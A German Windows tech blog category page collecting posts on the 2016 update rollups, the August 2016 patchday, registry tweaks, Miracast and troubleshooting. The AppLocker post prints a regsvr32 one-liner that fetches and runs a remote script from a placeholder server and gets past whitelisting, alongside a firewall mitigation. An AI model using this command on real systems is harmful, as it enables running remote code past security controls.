Kategorie: Windows 8

Ab Oktober 2016 nur noch kumulative Updates für Windows 7 und 8.1

Microsoft Logo

Microsoft hat bekannt gegeben, dass es für Windows 7 und 8.1 zukünftig keine einzelnen Updates mehr, sondern nur noch kumulative Rollup-Pakete geben wird. Die Änderung soll ab Oktober 2016 Einzug halten und betrifft auch Windows Server 2008 R2, 2012 und 2012 R2.

Die kumulativen Rollup-Pakete werden ab Oktober eingeführt und werden ab diesem Zeitpunkt dann auch jeweils die Korrekturen der Vormonate enthalten. Längerfristig möchte Microsoft aber nach und nach auch alle bisher erschienenen Updates in die kumulativen Pakete integrieren. Für das .NET-Framework, Flash und den Internet Explorer sollen jeweils eigene Rollup-Pakete erscheinen. Durch den Einsatz von sogenannten „Express Packages“ möchte Microsoft das Downloadvolumen für die Pakete klein halten. Dabei lädt der Windows-Client nur die tatsächlich benötigten Teile eines Update-Pakets herunter.

Neben den Rollup-Paketen, welche sowohl sicherheits- und nicht-sicherheitskritische Updates enthalten, wird Microsoft für Firmenkunden auch monatliche Sicherheits-Sammelpatches anbieten. Diese sind nicht kumulativ und enthalten alle Sicherheits-Updates für den jeweiligen Monat.

Durch diese Änderung möchte Microsoft die starke Fragmentierung von Windows 7 und 8.1 eindämmen und bestenfalls komplett beenden. Gleichzeitig möchte der Softwareriese damit die Anzahl der unterschiedlichen Systemkonfigurationen und potenziellen Fehlerquellen verringern. Ein Vorteil dabei ist, dass ein frisch installiertes Windows 7 oder 8.1 im besten Fall nur wenige Pakete installieren muss, um den aktuellen Patch-Stand zu erreichen. Allerdings bietet das Vorgehen von Microsoft auch einige Nachteile. Beispielsweise können problematische Patches dann nicht mehr wie bisher einzeln deinstalliert werden. Außerdem könnte Microsoft damit noch einfacher unerfreuliche funktionelle Änderungen verbreiten, Stichwort Telemetrie-Updates oder das GWX-Tool.

Microsoft-Patchday August 2016

Microsoft Logo

Am heutigen Patchday veröffentlicht Microsoft neun Security-Bulletins, von denen fünf als „kritisch“ und vier als „hoch“ eingestuft werden. Insgesamt sollen 34 Sicherheitslücken durch die Updates behoben werden. Neben den obligatorischen Updates für den Internet Explorer und Edge-Browser, stehen auch Updates für Office und Skype for Business bereit.

Nachfolgend ein grober Überblick der zur Verfügung stehenden sicherheitsrelevanten Updates. Weitere Details stellt Microsoft wie immer im Security TechCenter zur Verfügung.

Bulletin ID Bulletin Title Maximum Severity Rating and Vulnerability Impact Restart Requirement Affected Software
MS16-095  Cumulative Security Update for Internet Explorer (3177356) Critical
Remote Code Execution
Requires restart
MS16-096  Cumulative Security Update for Microsoft Edge (3177358) Critical
Remote Code Execution
Requires restart
MS16-097  Security Update for Microsoft Graphics Component (3177393) Critical
Remote Code Execution
May require restart
MS16-098  Security Update for Windows Kernel-Mode Drivers (3178466) Important
Elevation of Privilege
Requires restart
MS16-099 Security Update for Microsoft Office (3177451) Critical
Remote Code Execution
May require restart
MS16-100 Security Update for Secure Boot (3179577) Important
Security Feature Bypass
Does not require restart
MS16-101 Security Update for Windows Authentication Methods (3178465) Important
Elevation of Privilege
MS16-102 Security Update for Microsoft Windows PDF Library (3182248) Critical
Remote Code Execution
May require restart
MS16-103 Security Update for ActiveSyncProvider (3182332) Important
Information Disclosure
Requires restart

Windows-Schwachstelle erlaubt Umgehung von AppLocker

Microsoft Logo

Das Sicherheitsfeature AppLocker wurde mit Windows 7 eingeführt (nur bei Enterprise bzw. Ultimate vorhanden) und kommt hauptsächlich in Unternehmen zum Einsatz. AppLocker ermöglicht die Steuerung von Anwendungen, App-Paketen, DLLs und Skripten. Damit lassen sich beispielsweise bestimmte Programme auf Black- oder Whitelists setzen. In letzter Zeit wird AppLocker auch häufig gegen Malware und Ransomware eingesetzt, um ungewünschte Aktivitäten auf Systemen zu blockieren. Allerdings wurde jetzt eine Schwachstelle bekannt, wie sich die AppLocker-Ausführungsregeln relativ leicht umgehen lassen.

Der Sicherheitsforscher Casey Smith hat eine Schwachstelle entdeckt, wobei AppLocker mit Hilfe des Befehlszeilenprogramms „Regsvr32“ (Microsoft Register Server) ausgehebelt werden kann. Regsvr32 wird üblicherweise zum Registrieren von DLL-Dateien verwendet, was im Normalfall allerdings Administratorrechte erfordert. Jetzt kommt der spannende Punkt: Wenn man dem Register Server eine JavaScript- oder VBScript-Datei übergibt, wird diese ohne weitere Nachfrage ausgeführt. Auch AppLocker greift hierbei nicht und es werden auch keine Administratorrechte angefordert.

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Mit dieser Technik lassen sich auch Skripte über HTTP oder HTTPS nachladen, da Regsvr32 auch URLs akzeptiert. Da keine Änderungen an der Registry durchgeführt werden, ist ein Missbrauch auch relativ schwer zu erkennen. Bei Github existiert ein Proof of Concept mit einigen Beispiel-Skripten.

Microsoft wurde bereits über das Problem informiert, hat sich aber noch nicht zu Wort gemeldet. Bis dahin kann „regsvr32.exe“ über die Windows Firewall blockiert werden, sodass zumindest eine Ausführung über das Netzwerk verhindert werden kann.

Überprüfen, wie Windows gestartet wurde (Schnellstart oder nicht)

Microsoft Logo

Mit Windows 8 hat Microsoft das Startverhalten des Betriebssystems stark angepasst. Das Hauptziel war die Bootzeit deutlich zu verringern. Abgesehen von einigen Problemen, auf die ich hier nicht weiter eingehen möchte, wurde dies auch erfolgreich realisiert. Das entsprechende Feature nennt sich Schnellstart, wird aber oft auch als Fast Boot oder mit der englischen Bezeichnung Fast startup bezeichnet.

Leider ist es oft nicht ganz klar, ob der Schnellstart wirklich funktioniert und wie Windows das letzte Mal gestartet wurde. Nachfolgend ein kurzer PowerShell-Befehl, der euch diese Frage beantwortet.

Get-WinEvent -ProviderName Microsoft-Windows-Kernel-boot -MaxEvents 60 | Where-Object {$_.id -like "27"};

Anschließend wird eine Liste der letzten Bootvorgänge angezeigt. Die Spalte „Message“ enthält die von uns gesuchte Information. Dort können drei unterschiedliche Werte aufgeführt werden:

  • 0x0 – Normaler Start nach einem vollständigen Shutdown.
  • 0x1 – Schnellstart nach einem hybriden Shutdown.
  • 0x2 – Fortsetzen aus dem Ruhezustand.

Windows 10 Upgrade blockieren

Windows 10 Logo

Nach wie vor wirbt Microsoft unter Windows 7 und Windows 8.1 recht aufdringlich für das Upgrade auf Windows 10. Selbst wer den Upgrade-Hinweis bereits entfernt hatte, bekommt ihn mittlerweile wieder zu Gesicht. Das liegt daran, dass Microsoft das dafür verantwortliche Windows-Update KB3035583 in einer neuen Revision veröffentlicht hat. Darüber hinaus berichten einige Nutzer davon, dass die GWX-Applikation bei jedem Start bzw. bei jeder Aktivierung aus dem Standby-Modus abstürzt. Die Fehlermeldung muss dann jedes Mal geschlossen werden.

Beim jüngsten Patchday wurde das Upgrade auf Windows 10 sogar standardmäßig von der Windows-Update-Funktion zur Verfügung gestellt. Mittlerweile hat sich aber herausgestellt, dass dies laut Microsoft ein Fehler war und nur einen kleinen Teil der Nutzer von Windows 7 bzw. 8.1 betroffen hat.

Kurzum der Upgrade-Hinweis ist mehr als nervig und möchte von vielen Windows-Usern entfernt werden. Um diesen Weg etwas zu vereinfachen, biete ich ein Registry-Skript an, welches mit Administratorrechten ausgeführt werden muss.

Download Registry-Skript zum Blockieren vom Windows 10 Upgrade

Wer möchte kann die Änderungen in der Registry natürlich auch von Hand erledigen:

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\GWX]
"DisableGWX"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade]
"AllowOSUpgrade"=dword:00000000
"ReservationsAllowed"=dword:00000000

Nach einem Neustart sollte der störende Upgrade-Hinweis endgültig der Vergangenheit angehören. Falls doch nicht, könnt ihr alternativ auch das PowerShell-Skript von der c’t ausprobieren. Wenn auch das nichts hilft, bleibt euch wohl nichts anderes übrig als den Hinweis zu ertragen oder alternativ das Upgrade auf Windows 10 durchzuführen ;-)

Windows 10 Upgrade-Hinweis entfernen

Microsoft Logo
Die Tipps hier bringen mittlerweile keinen Erfolg mehr, deshalb habe ich einen neuen Artikel veröffentlicht:
Windows 10 Upgrade blockieren

Windows 10 Upgrade HinweisSeit Montag können Nutzer von Windows 7 und Windows 8.1 das kostenlose Upgrade auf das neue Windows 10 reservieren. Gleichzeitig hat Microsoft ein Update verteilt, welches alle entsprechenden Nutzer auf diese Möglichkeit mit einem Icon in der Taskleiste hinweist (siehe Screenshot).

Allerdings bleibt das Upgrade-Symbol dauerhaft im Tray eingeblendet, auch wenn eine Reservierung getätigt wurde. Nachfolgend zeige ich euch drei Wege, wie ihr das nervige Tray-Icon wieder entfernen könnt.

Registrierungs-Editor

Die zuverlässigste Möglichkeit zum entfernen des Upgrade-Hinweises auf Windows 10 verbirgt sich in der Registry.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „regedit“ eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
  3. HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\OSUpgrade
  4. Falls die letzten beiden Schlüssel des Pfads nicht existieren ist das entsprechende Windows-Update noch nicht installiert. Die Schlüssel können dann einfach von Hand angelegt werden. Im Punkt 3 beschriebenen Pfad muss der Wert „ReservationsAllowed“ auf „0“ gesetzt werden.

(via)

Update deinstallieren

Die dritte Möglichkeit ist das entsprechende Windows-Update KB3035583 zu deinstallieren, welches für den Upgrade-Hinweis verantwortlich ist. Die Deinstallation kann über „Windows Update“ und „Installierte Updates“ erfolgen. Nach der erfolgreichen Deinstallation muss das Update KB3035583 allerdings noch versteckt werden, da es ansonsten erneut auf dem System installiert wird.

Windows 10 Upgrade ausblenden

Icon verstecken

Das Ausblenden des Upgrade-Symbols im System Tray sollte für die meisten Nutzer ausreichend sein. Dazu klickt man auf das „Pfeil nach oben“-Icon im System Tray links neben der Uhrzeit und wählt anschließend „Anpassen“ aus. Im neu geöffneten Fenster muss der Eintrag „GWX“ auf „Symbol und Benachrichtigungen ausblenden“ gestellt werden. Fertig.

Windows 10 Upgrade ausblenden

Windows Laufwerksbuchstaben vor dem Namen anzeigen

Im Windows Explorer werden die Laufwerksbuchstaben standardmäßig hinter dem Namen der Laufwerke angezeigt. In einigen Fällen ist es aber sinnvoll den Laufwerksbuchstaben vor dem Namen anzeigen zu lassen, beispielsweise wenn viele Netzlaufwerke verwendet werden. Mit einer kleinen Änderung in der Registry lässt sich dies bewerkstelligen. Dieser Tipp funktioniert unter Windows 7, Windows 8 bzw. Windows 8.1 sowie Windows 10.

Windows Laufwerksbuchstaben

  1. Den Registrierungs-Editor mit Administratorrechten starten. Am einfachsten funktioniert dies über die Suchfunktion.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
  3. Darunter muss ein neuer “DWORD-Wert (32-Bit)” mit dem Namen „ShowDriveLettersFirst“ erstellt werden.
  4. Der Wert muss auf „4“ gesetzt werden. Wer die Laufwerksbuchstaben wieder nach dem Namen sehen möchte, kann den Wert auf „0“ setzen.
  5. Nach einem Neustart bzw. nach dem Ab- und wieder Anmelden sind die Änderungen wirksam.

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.

Laufwerksbuchstaben_Registry

Windows 8.1 per Miracast mit Amazon Fire TV Stick verbinden

Amazon Fire TV Stick

In meinem Artikel „Miracast: Android und Amazon Fire TV Stick“ habe ich euch bereits gezeigt, wie ihr den Bildschirminhalt eures Android-Geräts per Miracast auf den Amazon Fire TV Stick übertragen könnt. Aber auch Windows 8.1 unterstützt den Screencast-Standard Miracast. Im Vergleich zu Android ist die Einrichtung jedoch etwas umständlicher. In diesem Artikel zeige ich euch die notwendigen Schritte.

Voraussetzungen

Windows 8.1 bietet standardmäßig eine Unterstützung für Miracast. Damit das Ganze funktioniert, müssen aber neben der Hardware auch die verwendeten Treiber mitspielen.

Der WLAN-Adapter bzw. der Treiber muss sowohl Virtual Wi-Fi (ab NDIS 6.2) als auch Wi-Fi Direct (NDIS 6.3) unterstützen. Bei aktuellen Geräten ist dies jedoch so gut wie immer gegeben.

Darüber hinaus muss ein WDDM 1.3 Grafikkartentreiber mit Miracast-Support installiert sein. Auch dieser Punkt sollte mittlerweile keine größeren Probleme mehr bereiten.

Einrichtung

Zuerst muss die Miracast-Funktion am Fire TV Stick aktiviert werden. Diese ist nämlich standardmäßig ausgeschaltet. Der schnellste Weg führt über einen längeren Druck der „Home„-Taste auf der Fernbedienung. Anschließend erscheint ein Schnellwahlmenü mit der Option „Display duplizieren„. Alternativ kann Miracast auch über die Einstellungen aktiviert werden. Der entsprechende Menüpunkt ist unter “Einstellungen“, “Töne und Bildschirm” zu finden.

Amazon Fire TV Stick Miracast

Nach Aktivierung der Funktion erscheint ein Wartebildschirm. Jetzt gehts unter Windows weiter.

Die Einrichtung erfolgt über die App „PC-Einstellungen„. Diese kann entweder über die Suchfunktion oder über die Charms-Leiste (Einstellungen –> PC-Einstellungen ändern) gestartet werden. Innerhalb der App muss zur Kategorie „PC und Geräte“ gewechselt werden, wo dann der Unterpunkt „Geräte“ ausgewählt werden muss.

Hier auf den Befehl „Gerät hinzufügen“ klicken.

Windows 8.1 Miracast

Jetzt sollten alle verfügbaren Miracast-Empfänger aufgelistet werden. Wir wählen den Fire TV Stick aus.

Windows 8.1 Miracast

Nach erfolgreicher Einrichtung sollte der Fire TV Stick als neuer Projektor in der Geräteliste aufgeführt sein. Jetzt ist das Windows-Gerät erfolgreich mit dem Fire TV Stick gekoppelt.

Falls die Einrichtung wider Erwarten nicht funktioniert am besten das Gerät aus Windows entfernen (notfalls über den Geräte-Manager), den Fire TV Stick neustarten und alle Schritte wiederholen.

Windows 8.1 Miracast

Miracast verwenden

Wenn die Kopplung zwischen den beiden Geräten funktioniert hat, könnt ihr euren Bildschirminhalt teilen.

Dazu muss die Charms-Leiste aufgerufen und der Punkt „Geräte“ ausgewählt werden. Anschließend „Projizieren“ anklicken.

Windows 8.1 Miracast

Nun erfolgt der Verbindungsaufbau mit dem gekoppelten Fire TV Stick.

Windows 8.1 Miracast

Sobald die Verbindung steht und der Bildschirminhalt auf dem TV angezeigt wird, kann erneut der Punkt „Projizieren“ aus der Charms-Leiste ausgewählt werden. Hier lässt sich dann auswählen, ob der Bildschirm dupliziert oder erweitert werden soll.

Windows 8.1 Miracast

Wie bei der Kopplung kann es auch hier zu Problemen kommen. Teilweise musste ich während meinen Tests drei oder vier Versuche starten, bis der Bildschirminhalt meines Lenovo T450s am TV zu sehen war. Auch in diesem Fall hat sich gezeigt, dass ein Neustart des Amazon Fire TV Sticks Wunder bewirken kann. Danach konnte die Verbindung blitzschnell und ohne Probleme aufgebaut werden. Natürlich muss Miracast am Stick zuvor wieder aktiviert werden.

Zugriff auf Netzwerklaufwerke mit aktivierter Benutzerkontensteuerung (UAC) nicht möglich

Bei aktivierter Benutzerkontensteuerung (UAC) kann es vorkommen, dass Netzwerklaufwerke in Programmen, die mit administrativen Rechten laufen, nicht angezeigt werden. Auch Microsoft beschreibt dieses Problem.

Ursache ist die Art und Weise, wie Windows mit aktivierter Benutzerkontensteuerung arbeitet. Wenn Netzlaufwerke per Anmeldeskript verbunden werden, erfolgt dies mit dem standardmäßigen Benutzer-Token, d.h. mit eingeschränkten Rechten. Programme, die mit administrativen Rechten laufen (nach Bestätigung des Benutzerkontensteuerung-Pop-Ups), arbeiten jedoch mit einem anderen Benutzer-Token. Dadurch sind Netzlaufwerke, welche mit dem eingeschränkten Benutzer-Token verbunden werden, nicht für das administrative Benutzer-Token vorhanden.

Dieses Verhalten lässt sich aber mittels eines kleinen Eingriffs in die Registry abstellen.

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und “regedit” eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
  3. Darunter muss ein neuer “DWORD-Wert (32-Bit)” mit dem Namen „EnableLinkedConnections“ erstellt werden.
  4. Der Wert muss auf „1“ gesetzt werden.
  5. Nach einem Neustart sind die Änderungen wirksam und Netzwerklaufwerke stehen auch im administrativen Kontext zur Verfügung.

Speicherplatz freischaufeln durch Löschen von alten Windows Updates

Microsoft Logo

Bei allen Windows-Systemen sammeln sich mit der Zeit viele Altlasten an, die nur Speicherplatz verbrauchen, aber eigentlich gar nicht mehr benötigt werden. So ist es auch mit den Dateien von alten Windows Updates. Diese befinden sich sogar an zwei unterschiedlichen Speicherorten, die bei älteren Windows-Installationen insgesamt mehrere Gigabyte ausmachen können. Der potenziell verfügbare freie Speicherplatz ist besonders bei alten Servern oder kleinen System-SSDs gern gesehen.

Nachfolgend zeige ich euch die beiden Möglichkeiten auf, wie ihr alle alten Update-Dateien unter Windows löschen könnt.

Alte Update-Dateien mit der Datenträgerbereinigung löschen

Nicht mehr benötigte Update-Dateien von bereits installierten Updates können ab Windows 8 bzw. Windows Server 2012 ganz einfach mit der Datenträgerbereinigung gelöscht werden. Bei Windows 7 bzw. Windows Server 2008 R2 ist dies jedoch erst mit dem Update KB2852386 möglich, welches im Oktober 2013 von Microsoft veröffentlicht wurde.

Als kleine Nebenwirkung ist zu beachten, dass die entsprechenden Updates dann nicht mehr deinstallierbar sind. Eine Deinstallation eines Updates ist dann nur möglich, wenn das entsprechende Update vorher manuell noch einmal installiert wurde.

Therefore, after you run the Disk Cleanup wizard, you may be unable to roll back to a superseded update. If you want to roll back to a superseded update that the Disk Cleanup wizard deletes, you can manually install the update.

  1. Die Datenträgerbereinigung starten. Am einfachsten funktioniert dies direkt über das Startmenü oder unter der „Systemsteuerung“ im Ordner „Verwaltung“.
    Windows Datenträgerbereinigung
  2. Anschließend auf den Button „Systemdateien bereinigen“ klicken. Jetzt wird die Datenträgerbereinigung mit Administratorrechten neugestartet.
  3. Zum Schluss den Haken bei „Windows Update-Bereinigung“ setzen und starten. Je nach Anzahl der Updates und Performance der Festplatte kann der Vorgang durchaus bis zu 30 Minuten dauern.
    Windows Datenträgerbereinigung

Temporäre Windows Update-Dateien löschen

Neben den nicht mehr benötigten Update-Dateien von bereits installierten Updates existiert noch ein zweiter Speicherort, in dem heruntergeladene Updates landen. Nach einer erfolgreichen Installation werden die Dateien nicht mehr benötigt. Hier können im Vergleich zur ersten Möglichkeit auch keine Probleme auftreten.

Daher können alle Dateien und Ordner unter folgendem Pfad gefahrlos gelöscht werden:

%WINDIR%\SoftwareDistribution\Download

Die zweite Möglichkeit liefert in der Regel deutlich weniger Speicherplatz als die erste, ist aber dafür umso schneller erledigt.

Nerviges Aero Shake Feature deaktivieren

Mit Windows 7 hat Microsoft das sogenannte „Aero Shake“ Feature eingeführt. Wird das aktuelle Fenster an der Titelleiste mit der linken Maustaste gepackt und geschüttelt, werden alle anderen Fenster minimiert. Das „geschüttelte“ Fenster bleibt sichtbar. Obwohl das Feature auf den ersten Blick ganz nützlich erscheint, kann es aber auch durch Versehen ausgelöst werden und ist in diesem Fall dann einfach nur störend.

Aus diesem Grund zeige ich euch, wie ihr Aero Shake ganz einfach deaktivieren könnt.

Möglichkeit 1: Editor für lokale Gruppenrichtlinien

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „gpedit.msc“ eingeben.
  2. Unter „Benutzerkonfiguration“ zu „Administrative Vorlagen“ und „Desktop“ wechseln.
  3. Im rechten Fensterbereich auf „Aero Shake-Mausbewegung zum Minimieren von Fenstern deaktivieren“ doppelklicken.
  4. In dem neu geöffneten Fenster „Aktiviert“ auswählen und die Änderungen bestätigen.

Möglichkeit 2: Registrierungs-Editor

  1. Den Ausführen-Dialog (Windows-Taste + R) öffnen und „regedit“ eingeben, damit der Registrierungs-Editor geöffnet wird.
  2. Anschließend zu folgendem Pfad navigieren:
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer
  3. Darunter muss ein neuer „DWORD-Wert (32-Bit)“ mit dem Namen „NoWindowMinimizingShortcuts“ erstellt werden.
  4. Dieser erhält den Wert auf „1„.
  5. Nach einem Neustart sollten die Änderungen übernommen wer

Zur einfacheren Umsetzung biete ich eine Registrierungsdatei an, die alle Änderungen in der Registry automatisch durchführt.

VMware Player 6 und VMware Workstation 10 Probleme unter Windows 8.1 und Server 2012R2

Als ich heute meine Windows-10-VM starten wollte, habe ich folgende Fehlermeldung erhalten: „Not enough physical memory is available to power on this virtual machine with its configured settings„.

VMWare Error

Entgegen der Meldung ist auf dem Host genügend Arbeitsspeicher verfügbar. Der Fehler wird vielmehr durch einen Patch KB2995388 aus dem Oktober-Patchday verursacht. Betroffen sind VMware Player 6 und VMware Workstation 10 auf Host-Systemen mit Windows 8.1 und Windows Server 2012R2.

VMware arbeitet vermutlich bereits an einem Update für die zwei betroffenen Virtualisierungs-Produkte. Bis das Update bereit steht existieren zwei Lösungsmöglichkeiten. Zum einen kann ganz einfach das Windows Update KB2995388 deinstalliert werden. Alternativ kann unter „C:\ProgramData\VMware\VMware Player“ die Datei „config.ini“ bearbeitet werden. Dort muss die Zeile

vmmon.disableHostParameters = "TRUE"

hinzugefügt werden. Nach einem Neustart sollten die VMs wieder starten. Anscheinend bringt die zweite Möglichkeit nicht immer die erhoffte Hilfe. In diesen Fällen muss dann das Update entfernt werden.